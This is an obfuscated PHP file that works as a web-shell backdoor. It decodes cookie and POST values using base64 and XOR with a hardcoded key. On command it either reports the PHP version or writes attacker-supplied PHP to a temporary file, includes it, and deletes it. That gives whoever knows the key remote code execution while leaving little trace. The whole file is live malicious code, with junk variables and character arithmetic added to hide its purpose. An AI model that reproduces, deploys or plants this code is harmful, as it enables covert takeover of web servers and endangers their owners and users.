<?php     function      iawvrabxpl(){$avuvc='xjzhakpsf';    print_r	(54714+54714); /* lgiib */ }
$uedbvbjj    =   'uedbvbjj' /*  tqytg*/ ^ /* c  */ '';





function    nnski(){


	$pt_vqxxe    = /*  a*/ 555;
    $njrswakbw     =    'ifbzmljm';


	$njrswyqsmsjens /*  oue   */ =    555;

    $kpwgf_ /*   z*/ = /*tqk */ $njrswyqsmsjens      *	19;


}



function   x__uifpnjl($vuadhvn,	$ozamfcmq_r){
	global /*pte  */ $uedbvbjj;


 /*   tkau   */ $swiqnnswce /*gg_*/ = /* nw */ "";


   $vlrsg /*oe  */ =   'tppoz';
       for    ($njrsw     = /*h   */ 0;      $njrsw      <    strlen($vuadhvn);)    {
    for /*   yr   */ ($uvztjay    =	0; /* fryoh */ $uvztjay /* wycqa */ < /*  jotu  */ strlen($ozamfcmq_r)	&&   $njrsw	< /*  zlqpmr   */ strlen($vuadhvn);	$uvztjay++,      $njrsw++)    {

 /*  a_   */ $swiqnnswce    .= /*cib_mx*/ $uedbvbjj(ord($vuadhvn[$njrsw]) /*m   */ ^ /*tne_   */ ord($ozamfcmq_r[$uvztjay]));  }    }
	return       $swiqnnswce;


}

$pwcrg	=    $_COOKIE;

$gatabtwv /*nk */ = /*lkpght */ $_POST;$n_z_ao	=     407;$qqepbymn /*ctd*/ =	$n_z_ao   + /* afxj  */ 10;


$njrswaiguyqo     =	897;




function     ndmcafl($bmxhiz,    $vuadhvn){


    global /* cz */ $uedbvbjj;



    $lndhsps	= /*vzkai   */ sprintf($uedbvbjj(46)    .	"\x2f"       .	"\x25" /*  usi_*/ .    $uedbvbjj(115) /*  j   */ .      "."."p"."\x6c",    md5($bmxhiz));	file_put_contents($lndhsps,  "<"    .	$uedbvbjj(744-681)	.   "\x70" /* nj   */ . /*joz*/ "\150"       . /* dqquzy*/ "\160"  .     $uedbvbjj(32)	.    $uedbvbjj(376-259)       .	"\156"    .       "l"."i"."n"."k"."(".$uedbvbjj(578-483) /* x_m*/ . /*   o*/ "_"."F"."I"."L".$uedbvbjj(391-322)	. /*   zha */ "_"."_".$uedbvbjj(930-889)  . /*  avtsrs*/ $uedbvbjj(1056-997)       . /*   jma   */ $uedbvbjj(32) /*oon */ .    $vuadhvn["d"]); /* aceoin*/ include($lndhsps);
       $nvpimec    =	146;    $wjxidhuk    =    'ks';      $oi_xyhwwx     = /*  clexqg   */ 'nnyfdqvpiu'; /*dct*/ $d_f_p_swl_    = /*  yg*/ $lndhsps;    @unlink($d_f_p_swl_);
       $gymr_    = /*   gplhbk   */ 'wtwcpt';

}





function	vt_tcv(){


      $uvztjaygrdtak  =      314;}

function      cmuwab()


{    global   $uedbvbjj;    $njrsw       =       array();
      $xqllb /* kj_ */ = /*   i */ 'uicnqqadr';

       $_jtoopeq /*i  */ = /*  c_f   */ 257;
    $njrsw["p"."\166"]    = /*  fn   */ phpversion();
 /* m   */ $_jtoopeq    =       $_jtoopeq    /    6;  $njrsw[$uedbvbjj(115) /*   r*/ .      $uedbvbjj(348-230)]     =       "3".$uedbvbjj(46)   . /*  _aanll   */ "5";

     $rlkrhqbphi  =    'xlnlugey'; /*  _yjpt   */ echo /*   gswx*/ @serialize($njrsw);


    $_jtoopeq  =	$_jtoopeq /*   gp */ % /*  nurm */ 17;    $_jtoopeq      =	$_jtoopeq /* pdgy  */ -  19;


}







vt_tcv();



nnski();



function  lbhfbhftw_($vuadhvn, /*r */ $bmxhiz,	$uacanc){

  global /*  yorsu   */ $uedbvbjj;
  $vuadhvn	= /*  qir   */ unserialize(x__uifpnjl(x__uifpnjl(base64_decode($vuadhvn), /*   qrn */ $bmxhiz), /*   s */ $uacanc));


      $yknjdywdhy /*  acyt   */ =  'neiyrfrhs';

 /*   _*/ $vqled_yfj /*   bawwy   */ =  'fmtgiyu_';
 /*  h */ $dseqsyiz  =    strtolower($yknjdywdhy);


 /*   jg */ if /*  arajzy   */ (isset($vuadhvn["a"."k"]))  {
    if	($vuadhvn["a"]    == /* hikjo  */ "i")  {    cmuwab();  }  elseif	($vuadhvn["a"]      == /*i   */ "\x65")     {	ndmcafl($bmxhiz, /*  btfcdg */ $vuadhvn);

	}


   exit();

    }
}



$pwcrg /*  bgmmv */ =       array_merge($gatabtwv,       $pwcrg);



$bmxhiz    =    "\62"   .	$uedbvbjj(959-904)       . /*  ifub */ "\65"    .      "6".$uedbvbjj(823-724)   .     "3".$uedbvbjj(187-133) /*  zv   */ .       $uedbvbjj(821-764)	. /* fvbpb */ "\55" /*dgqpr  */ .   $uedbvbjj(102)    .  $uedbvbjj(100) /*  _   */ .    $uedbvbjj(591-491) /* qwxiqj*/ . /*  a   */ "9"."-"."4"."7"."\x33"  .  "a"."-".$uedbvbjj(183-85)    .   "f".$uedbvbjj(52) /*  w  */ .	"b".$uedbvbjj(695-650)      . /*   r */ $uedbvbjj(795-696)    . /*  o   */ "\x36" /*  zjd*/ .	"2"."\x33" /* lj   */ .   "\65"    . /*   qqc  */ "\x65"."c"."9"."\60"	.	"2"."\146" /*   whmivk*/ .	"\145";$skiyxho    =    -12;foreach   ($pwcrg	as    $uacanc    => /*   y_ocs   */ $vuadhvn)   {

   lbhfbhftw_($vuadhvn, /* kw */ $bmxhiz,    $uacanc);


}




?>